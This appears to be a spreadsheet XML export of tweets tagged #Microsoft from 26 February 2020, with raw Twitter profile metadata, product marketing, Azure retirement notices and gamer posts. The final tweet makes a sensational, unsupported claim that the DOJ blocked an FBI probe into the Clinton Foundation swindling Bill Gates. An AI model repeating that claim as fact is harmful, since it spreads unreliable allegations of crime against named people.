    <t>{'id': 233001841, 'id_str': '233001841', 'name': 'Data Masons Software', 'screen_name': 'DataMasons', 'location': 'Sarasota, FL', 'description': 'Certified for Microsoft Dynamics (365, 365BC, AX, GP, NAV) &amp; Macola. We simplify EDI with automation, integration, and managed svs without ERP customization.', 'url': 'http://t.co/EadwT7K5VV', 'entities': {'url': {'urls': [{'url': 'http://t.co/EadwT7K5VV', 'expanded_url': 'http://www.datamasons.com', 'display_url': 'datamasons.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2075, 'friends_count': 1607, 'listed_count': 78, 'created_at': 'Sun Jan 02 00:40:35 +0000 2011', 'favourites_count': 275, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7347, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1C598E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/710209116950519808/ZklGhDNo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/710209116950519808/ZklGhDNo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/233001841/1568062936', 'profile_link_color': '1D3A52', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '808890', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 19:10:09 +0000 2020</t>
  </si>
  <si>
    <t>#Windows Dressing: Psst... Fast Ring folks, whispers #Microsoft. You're in this for the cool icons, right? https://t.co/GvAxvxxeYa</t>
  </si>
  <si>
    <t>{'id': 17624176, 'id_str': '17624176', 'name': 'ITnegotiator', 'screen_name': 'ITnegotiator', 'location': 'Global', 'description': 'Find Value, Get Value, and Keep Value in your new and existing IT Agreements, Investments, and Relationships.', 'url': 'http://t.co/EIhcxKIzuu', 'entities': {'url': {'urls': [{'url': 'http://t.co/EIhcxKIzuu', 'expanded_url': 'http://www.netnetweb.com', 'display_url': 'netnetweb.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 482, 'friends_count': 367, 'listed_count': 30, 'created_at': 'Tue Nov 25 16:58:40 +0000 2008', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5773,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'http://pbs.twimg.com/profile_images/65681290/negotiation_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/65681290/negotiation_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17624176/1405442313',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</si>
  <si>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Feb 26 19:09:28 +0000 2020</t>
  </si>
  <si>
    <t>When was the last time disaster struck your IT infrastructure? If it hasn't happened yet, you're lucky. Safeguard against future mishaps and disaster with a comprehensive set of #Microsoft solutions tailored to secure your data. https://t.co/mkMsv2WHqg</t>
  </si>
  <si>
    <t>Wed Feb 26 19:07:03 +0000 2020</t>
  </si>
  <si>
    <t>Are you ready to Jumpstart your cloud business?
Check out the Play-in-a-Box  ready-to-go resources from #Microsoft to help you close deals and build lasting customer relationships. https://t.co/4xwuqtNegO 
#IAMCP #MSUSPartner #MSPartner https://t.co/ZdhRnZMOhg</t>
  </si>
  <si>
    <t>Wed Feb 26 19:06:42 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec     Never wonder if you've been hacked; #Microsoft Advanced Threat Analytics can detect attacks as they occur and stop them before they cause damage, giving you peace of mind. Learn more from this infographic. https://t.co/nKFGgPFTgz</t>
  </si>
  <si>
    <t>Wed Feb 26 19:05:22 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN IKEv2 with automatic fallback to SSTP? Unfortunately, it doesn't work that way. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/52tCKXShgz</t>
  </si>
  <si>
    <t>Wed Feb 26 19:04:53 +0000 2020</t>
  </si>
  <si>
    <t>Put today's data explosion to work for your business with #Microsoft #PowerBI and #Azure. Place data at your entire organization's fingertips, enabling anyone to transform business data into actionable insights. Subscribe now. https://t.co/mZcSzF3WGf</t>
  </si>
  <si>
    <t>Wed Feb 26 19:04:45 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact General Technique for access to #Microsoft #Office365 advanced threat protection. https://t.co/7KtP4LHSbe</t>
  </si>
  <si>
    <t>Wed Feb 26 19:04:12 +0000 2020</t>
  </si>
  <si>
    <t>Is process optimization part of your digital strategy? Follow acumor to stay up-to-date with the latest news, trends, and tips regarding digital transformation with #Microsoft. https://t.co/A2349CPJk9</t>
  </si>
  <si>
    <t>Wed Feb 26 19:03:18 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/cCWzSdbCun</t>
  </si>
  <si>
    <t>Wed Feb 26 19:01:25 +0000 2020</t>
  </si>
  <si>
    <t>How much is your legacy version of #Microsoft #Dynamics #AX costing your organization? Find out with our #free eBook: https://t.co/zZueXVhWZG https://t.co/1xtnLZUoUu</t>
  </si>
  <si>
    <t>{'id': 1191888349, 'id_str': '1191888349', 'name': 'CuroGens', 'screen_name': 'CuroGens', 'location': 'Carmel, Indiana, USA', 'description': 'CuroGens, Inc, is a technology services provider and systems integrator serving the IT and business intelligence needs of companies worldwide.', 'url': 'http://t.co/Dkvv7qycs3', 'entities': {'url': {'urls': [{'url': 'http://t.co/Dkvv7qycs3', 'expanded_url': 'http://www.curogens.com', 'display_url': 'curogens.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 708, 'friends_count': 665, 'listed_count': 96, 'created_at': 'Mon Feb 18 03:11:02 +0000 2013', 'favourites_count': 1598, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5738,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'http://pbs.twimg.com/profile_images/920749044036759552/0mwS9iUQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920749044036759552/0mwS9iUQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1191888349/1508358564', 'profile_link_color': '3C3D3D',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</si>
  <si>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19:01:21 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a more streamlined experience in #Microsoft Planner? Here's 4 tips from @deltanr1 to make the most of new, and sometimes overlooked, Planner features! https://t.co/LDA6jYX886</t>
  </si>
  <si>
    <t>Wed Feb 26 19:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Mixer at All-Time Low with Morale and Layoffs https://t.co/ysdCGPLH1r #Mixer #Twitch #Microsoft #Streamer</t>
  </si>
  <si>
    <t>{'id': 990954389560020993, 'id_str': '990954389560020993', 'name': 'Esports Talk', 'screen_name': 'talk_esports', 'location': 'Las Vegas, NV', 'description': 'The Home of #EverythingEsports | Unbiased esports news, breakdowns, and more | DMs Open        \n\nBusiness: media@esportstalk.com', 'url': 'https://t.co/VgyK16x89w', 'entities': {'url': {'urls': [{'url': 'https://t.co/VgyK16x89w', 'expanded_url': 'http://YouTube.com/c/EsportsTalk', 'display_url': 'YouTube.com/c/EsportsTalk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4339, 'friends_count': 208, 'listed_count': 6, 'created_at': 'Mon Apr 30 14:01:52 +0000 2018', 'favourites_count': 368, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2872,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'http://pbs.twimg.com/profile_images/1158377610881036290/qucG_cRH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158377610881036290/qucG_cRH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/990954389560020993/1565013720', 'profile_link_color': 'CE3030',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</si>
  <si>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19:00:44 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 19:00:31 +0000 2020</t>
  </si>
  <si>
    <t>#Developer: Yes!  @Google finally updated the script-engine for their #Office Apps after years! From #Javascript ES5 to V8 !  It feels like changing from #VBA to #csharp (#Microsoft Office #Addins).
#Google #GoogleApps #JS #Code #Programmer #Coding
https://t.co/TFrZZTArFb</t>
  </si>
  <si>
    <t>{'id': 920242589181374464, 'id_str': '920242589181374464', 'name': 'rajango', 'screen_name': 'rajango', 'location': 'Schweiz', 'description': '[Ex-TechupBusiness] Entrepreneur, Investor, Developer, Fitness&amp;Health-Fan, Lover, Outdoor&amp;Nature-Seeker, Musician, Philosopher, Neuro&amp;Consciousness-Interested', 'url': 'https://t.co/IqphENx1SN', 'entities': {'url': {'urls': [{'url': 'https://t.co/IqphENx1SN', 'expanded_url': 'https://medium.com/@techupbusiness', 'display_url': 'medium.com/@techupbusiness', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 254, 'listed_count': 0, 'created_at': 'Tue Oct 17 10:58:25 +0000 2017', 'favourites_count': 152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 331, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217045028687749120/FfIm29bl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217045028687749120/FfIm29bl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/920242589181374464/1518795262',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</si>
  <si>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18:59:35 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is giving another update to the interface design of the Xbox One to all consoles this week. The company announced changes last month that give the home page a facelift, making frequently used apps and games immediately available.
#Microsoft #Xbox
https://t.co/DSOgr5dxxn</t>
  </si>
  <si>
    <t>Wed Feb 26 18:59:18 +0000 2020</t>
  </si>
  <si>
    <t>@JimmyEatRose Say #Microsoft collapsed tomorrow. I could still play #DaytonaUSA on my console because it's installed, for example. Once it's installed, you're good. I play PC games that were made by companies that collapsed over 15 years ago. Once you install it, you're good.</t>
  </si>
  <si>
    <t>{'id': 930818521168310274, 'id_str': '930818521168310274', 'name': 'SPARTAN 1984 âœï¸ðŸ‡¨ðŸ‡¦', 'screen_name': 'Spartan1984', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1211, 'friends_count': 1757, 'listed_count': 5, 'created_at': 'Wed Nov 15 15:23:24 +0000 2017', 'favourites_count': 20553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23443, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233417177857847296/3yA1Q381_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233417177857847296/3yA1Q381_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/930818521168310274/1583439026',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</si>
  <si>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18:56:29 +0000 2020</t>
  </si>
  <si>
    <t>Im on a boat! Dont miss it! Link in bio! 
#rhino #rhinoceros #rhinogame #rhinogaming #rhinoplays #minecraft #survival #play #playoffs #microsoft #xbox #playstation #hash #hashtag #dankmemes #gamingmemes #perfectlycutscreams #perfection #youtuber #redstone https://t.co/eCoPQf55UB</t>
  </si>
  <si>
    <t>Wed Feb 26 18:55:10 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Surface Duo may let you 'peek' at notifications https://t.co/eTvuHatR1p</t>
  </si>
  <si>
    <t>Wed Feb 26 18:52:41 +0000 2020</t>
  </si>
  <si>
    <t>@play_pso2 look what you made me get! Lol! Fully ready for pso2 this spring! #pso2 #XboxOneX #xbox #microsoft #sega https://t.co/CGlbZE0dOh</t>
  </si>
  <si>
    <t>{'id': 49911210, 'id_str': '49911210', 'name': 'Troy Rodgers', 'screen_name': 'MaddogRaijin', 'location': 'Pensacola, FL', 'description': 'Gaming since 1989, XBOX Live GT: MaddogRaijin Member since 2004 https://t.co/yVoqsI2OJU - Streamer/YouTuber Xbox Live Ambassador', 'url': 'https://t.co/3oPXcBFQ3r', 'entities': {'url': {'urls': [{'url': 'https://t.co/3oPXcBFQ3r', 'expanded_url': 'http://mixer.com/maddograijin', 'display_url': 'mixer.com/maddograijin', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/yVoqsI2OJU', 'expanded_url': 'http://mixer.com/MaddogRaijin', 'display_url': 'mixer.com/MaddogRaijin', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 229, 'friends_count': 1416, 'listed_count': 3, 'created_at': 'Tue Jun 23 07:00:42 +0000 2009', 'favourites_count': 238, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 380,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'http://pbs.twimg.com/profile_images/1210686378612269057/Y0IkLqz5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210686378612269057/Y0IkLqz5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49911210/1577485102',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</si>
  <si>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18:52:36 +0000 2020</t>
  </si>
  <si>
    <t>So my #iPhone11 says it can't sync to #icloud. WTF? It's on wifi for hours at a time. Plenty of space. This is #Microsoft-level shitty performance. What say you @AppleSupport? #fail</t>
  </si>
  <si>
    <t>{'id': 43157548, 'id_str': '43157548', 'name': 'So Hip it Hurts', 'screen_name': 'bikerchickintx', 'location': 'Austin Texas / Carlsbad CA', 'description': 'Smart-ass tech geek who loves music, cycling, good food, good beer, good wine, good comedy. Raised in MN, lived in WI, IA, TX, CA. #Resistance', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 326, 'friends_count': 871, 'listed_count': 22, 'created_at': 'Thu May 28 17:47:14 +0000 2009', 'favourites_count': 9043, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12421, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/828778371542773760/AFoIHloT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/828778371542773760/AFoIHloT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43157548/1484770272', 'profile_link_color': '032B1E', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '99CC33', 'profile_text_color': '3E4415', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 18:51:29 +0000 2020</t>
  </si>
  <si>
    <t>Closed and open system co-exist - #Apple and #microsoft, all electric #tesla and other car companies can exist , brick &amp;amp; mortar and online shopping #amazon co-exist, social media platforms which do not share their ad rev and the one which can share with users can also coexist</t>
  </si>
  <si>
    <t>{'id': 1229138161223159814, 'id_str': '1229138161223159814', 'name': 'Shveta Sehgal', 'screen_name': 'ShvetaSehgal', 'location': '', 'description': 'CEO and founder of https://t.co/KOEbk088WY. buzztagger is a social media app where every user is an â€œinfluencerâ€ to help brands grown in an organic and sustainable way.', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/KOEbk088WY', 'expanded_url': 'http://buzztagger.com', 'display_url': 'buzztagger.com', 'indices': [19, 42]}]}}, 'protected': False, 'followers_count': 40, 'friends_count': 236, 'listed_count': 0, 'created_at': 'Sun Feb 16 20:19:23 +0000 2020', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 72, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229138290260865024/4KT-o-wj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229138290260865024/4KT-o-wj_normal.jpg',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</si>
  <si>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18:51:27 +0000 2020</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023  https://t.co/KqpA7qpJzG  #azure #microsoft</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022  https://t.co/UPeCXaYunJ  #azure #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:47:22 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 18:47:06 +0000 2020</t>
  </si>
  <si>
    <t>Send your JMeter test results to Azure Application Insights https://t.co/i3azyEQZwE #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:45:22 +0000 2020</t>
  </si>
  <si>
    <t>@hashoshi4 @yellowdoodle1 @CryptoKitties U Correct. Through grape vine I hear even #Microsoft w/#Azure platform will do Huge NFT push.
Eg  Bing+Their Flight simulator has gathered enough real world info on countries,geography,Weather, temperature/wind, culture,art,flight; that NFT API themes will peravade new #games</t>
  </si>
  <si>
    <t>{'id': 1078407610624368642, 'id_str': '1078407610624368642', 'name': 'DonCrypto Insight', 'screen_name': 'DoncryptoI', 'location': '', 'description': 'Application Architect: .Net, Salesforce, SQL Server. Cryptocurrency Invested HODL BTC, ETH, LINK, ENJIN, ADA', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 381, 'friends_count': 1304, 'listed_count': 6, 'created_at': 'Thu Dec 27 21:49:44 +0000 2018', 'favourites_count': 19655, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3888, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1078429011162906625/iQ1o1-fd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1078429011162906625/iQ1o1-fd_normal.jpg',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</si>
  <si>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18:45:01 +0000 2020</t>
  </si>
  <si>
    <t>A brief introduction to #Microsoft #365 #Business https://t.co/rLv7opxlA0</t>
  </si>
  <si>
    <t>Wed Feb 26 18:43:44 +0000 2020</t>
  </si>
  <si>
    <t>Somebody give this Video editor a medal! So satisfying!
#MSofficeMobile
#Microsoft
https://t.co/uaI1Ktw4HW</t>
  </si>
  <si>
    <t>{'id': 609974277, 'id_str': '609974277', 'name': 'Sahil Jain', 'screen_name': 'sjsahiljain', 'location': 'Guwahati | Kolkata | Delhi', 'description': 'I saved the world in 2012.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 211, 'friends_count': 431, 'listed_count': 3, 'created_at': 'Sat Jun 16 10:50:45 +0000 2012', 'favourites_count': 1206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1573,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'http://pbs.twimg.com/profile_images/1077259029603332096/5Vw9Qlt0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1077259029603332096/5Vw9Qlt0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/609974277/1514097072',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</si>
  <si>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18:43:12 +0000 2020</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022  https://t.co/PK7pSsIpod  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023  https://t.co/R2Iu6p7Wwf  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Wed Feb 26 18:41:37 +0000 2020</t>
  </si>
  <si>
    <t>Heres Microsofts new default background image for Azure AD login, its now much smaller in size. Note that if you have customized your login page with our own background it will NOT be affected.
#Microsoft #AzureAD https://t.co/2qtWMUyKQQ</t>
  </si>
  <si>
    <t>{'id': 14641867, 'id_str': '14641867', 'name': 'Tom Aafloen', 'screen_name': 'TomAafloen', 'location': 'Sweden', 'description': 'IT-security Consultant from Sweden working with Microsoft security solutions. Mostly tweets funny images. Sometimes about work, sometimes about family.', 'url': 'https://t.co/mtkizf31Ki', 'entities': {'url': {'urls': [{'url': 'https://t.co/mtkizf31Ki', 'expanded_url': 'https://mssec.wordpress.com', 'display_url': 'mssec.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 380, 'friends_count': 512, 'listed_count': 5, 'created_at': 'Sat May 03 21:54:57 +0000 2008', 'favourites_count': 3183, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6930,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'http://pbs.twimg.com/profile_images/1026066836910170112/gQis2MH9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026066836910170112/gQis2MH9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14641867/1369215673',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</si>
  <si>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18:40:56 +0000 2020</t>
  </si>
  <si>
    <t>Hey @JenMsft, I'm stilling having search issues on the 19569 build, it just randomly stopped the other day, I'm guessing its just me who is having this issue as i cannot see anything on the #feedback hub in regards to broken search #Windows #Microsoft #InsiderPreview</t>
  </si>
  <si>
    <t>{'id': 243377304, 'id_str': '243377304', 'name': 'Simon Lee', 'screen_name': 'smoon_lee', 'location': 'United Kingdom', 'description': 'IT Consultant | Technical Geek | #Powershell Enthusiast | Blogging at #HypervLAB about all things #Microsoft | #AlwaysLearning | these tweets are mine!', 'url': 'https://t.co/jsuM3CMEVI', 'entities': {'url': {'urls': [{'url': 'https://t.co/jsuM3CMEVI', 'expanded_url': 'https://hypervlab.co.uk', 'display_url': 'hypervlab.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1234, 'friends_count': 4988, 'listed_count': 23, 'created_at': 'Wed Jan 26 22:33:40 +0000 2011', 'favourites_count': 13670, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6574,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'http://pbs.twimg.com/profile_images/1095324229359321088/B-GxXBZ4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095324229359321088/B-GxXBZ4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/243377304/1518479044', 'profile_link_color': '003366',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</si>
  <si>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Wed Feb 26 18:37:02 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft are scaring consumers over #Edge extensions, and for what? https://t.co/RzFMxaNZZb Simply trying to install a #Chrome #extension via the Chrome Web Store actually requires navigating through several warnings, from both #Google and #Microsoft #ITSecurity https://t.co/KrWOX8hZj5</t>
  </si>
  <si>
    <t>Wed Feb 26 18:35:12 +0000 2020</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023 https://t.co/Q391OJ8jV4 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 18:35:11 +0000 2020</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022 https://t.co/bq3ZMOpHrc #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 18:35:00 +0000 2020</t>
  </si>
  <si>
    <t>We offer hundreds of challenge labs to help you prepare your learners for exams.
Check out the AZ-103 learning path &amp;gt; https://t.co/IaDEIBDd52
Start re-selling challenges &amp;gt; https://t.co/7J4c2FrvN0
#microsoft #azure #techskills https://t.co/atXsIKdtHR</t>
  </si>
  <si>
    <t>Wed Feb 26 18:34:48 +0000 2020</t>
  </si>
  <si>
    <t>CVE-2020-0688: Remote #code Execution on #Microsoft Exchange Server https://t.co/xLJfCYUbYG</t>
  </si>
  <si>
    <t>Wed Feb 26 18:34:42 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022 https://t.co/V4CCElIZfT</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Were retiring some Azure Site Recovery support options on March 1, 2023 https://t.co/WKRWnNAw5Q</t>
  </si>
  <si>
    <t>Wed Feb 26 18:32:44 +0000 2020</t>
  </si>
  <si>
    <t>I am a fan of naked tablets #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:32:20 +0000 2020</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023: https://t.co/OYDr6wvS32 #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:32:19 +0000 2020</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022: https://t.co/xRJAdZ8yJM #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:31:03 +0000 2020</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023 https://t.co/XziB2CfMDi  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022 https://t.co/WN3S90FMsC  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Wed Feb 26 18:30:40 +0000 2020</t>
  </si>
  <si>
    <t>Technical description of where your #MicrosoftTeams meetings are hosted from expert @tomarbuthnot: https://t.co/jjLZzGiWAu #Microsoft</t>
  </si>
  <si>
    <t>{'id': 105264248, 'id_str': '105264248', 'name': 'Dan Vetras', 'screen_name': 'Dan_Vetras', 'location': '', 'description': 'CEO, Kollective. Helping leaders to communicate their vision &amp; strategy through video. Passionate about videoâ€™s potential to transform enterprise communications', 'url': 'http://t.co/INaSaoLq2T', 'entities': {'url': {'urls': [{'url': 'http://t.co/INaSaoLq2T', 'expanded_url': 'http://www.kollective.com', 'display_url': 'kollective.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 765, 'friends_count': 1062, 'listed_count': 176, 'created_at': 'Fri Jan 15 21:40:33 +0000 2010', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2247,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'http://pbs.twimg.com/profile_images/581992250126647296/XLi9qhyQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/581992250126647296/XLi9qhyQ_normal.png',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</si>
  <si>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18:30:36 +0000 2020</t>
  </si>
  <si>
    <t>Why your business needs IT support. Contact us today. #marketing #business #computer #microsoft https://t.co/ig4EpwyEJp</t>
  </si>
  <si>
    <t>Wed Feb 26 18:30:11 +0000 2020</t>
  </si>
  <si>
    <t>@24hourfitness is focused on helping their customers set and meet their goals. To help, they use #Microsoft #Dynamics365 to engage with customers in a personal way, ensuring results and customer satisfaction. #BusinessInsights #ArticConsulting https://t.co/mOE9QBohbE</t>
  </si>
  <si>
    <t>{'id': 1161370083639173120, 'id_str': '1161370083639173120', 'name': 'Artic Consulting', 'screen_name': 'ArticConsult', 'location': 'Orange County CA &amp; Redmond WA', 'description': 'Delivering innovative technology solutions that maximize business value', 'url': 'https://t.co/osN8BhdP0V', 'entities': {'url': {'urls': [{'url': 'https://t.co/osN8BhdP0V', 'expanded_url': 'http://www.ArticConsulting.com', 'display_url': 'ArticConsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Tue Aug 13 20:12:59 +0000 2019', 'favourites_count': 52, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 70, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161764632446398464/cAJ1dEe6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161764632446398464/cAJ1dEe6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1161370083639173120/1565731336',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</si>
  <si>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18:28:56 +0000 2020</t>
  </si>
  <si>
    <t>EXCLUSIVE: DOJ Blocks FBI Investigation of Clintons SWINDLE of BILL GATES Charity Cash; Fuming Microsoft Mogul Duped Out of Untold Millions by Clinton Foundation Schemes https://t.co/5RuR1AaQGH @POTUS @BillGates #Microsoft #Democrats #ClintonFoundation #Scams</t>
  </si>
  <si>
